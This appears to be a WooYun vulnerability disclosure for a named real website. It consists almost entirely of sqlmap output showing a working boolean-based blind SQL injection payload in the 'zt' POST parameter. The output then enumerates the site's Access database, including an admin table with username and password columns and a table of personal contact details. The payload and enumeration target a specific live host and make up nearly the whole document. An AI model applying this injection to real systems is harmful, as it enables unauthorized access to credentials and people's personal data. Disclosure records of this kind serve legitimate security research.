WooYun.org

http://xjd.tcl.com/jxscx.asp

---
Place: POST
Parameter: zt
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: zt=-7195' OR (2903=2903) AND 'wMcP'='wMcP
---
[04:48:41] [INFO] testing Microsoft Access
[04:48:47] [INFO] confirming Microsoft Access
[04:48:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[6 tables]
+-----------+
| admin     |
| guestbook |
| model     |
| news      |
| product   |
| questions |
+-----------+
Database: Microsoft_Access_masterdb
Table: admin
[7 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| intro      | non-numeric |
| name       | non-numeric |
| nr         | non-numeric |
| templateid | numeric     |
| type       | non-numeric |
| username   | non-numeric |
| userpwd    | non-numeric |
+------------+-------------+
Database: Microsoft_Access_masterdb
Table: model
[13 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| address    | non-numeric |
| age        | non-numeric |
| city       | non-numeric |
| email      | non-numeric |
| height     | non-numeric |
| id         | numeric     |
| intro      | non-numeric |
| mobile     | non-numeric |
| msn        | non-numeric |
| name       | non-numeric |
| nr         | non-numeric |
| templateid | numeric     |
| type       | non-numeric |
+------------+-------------+
......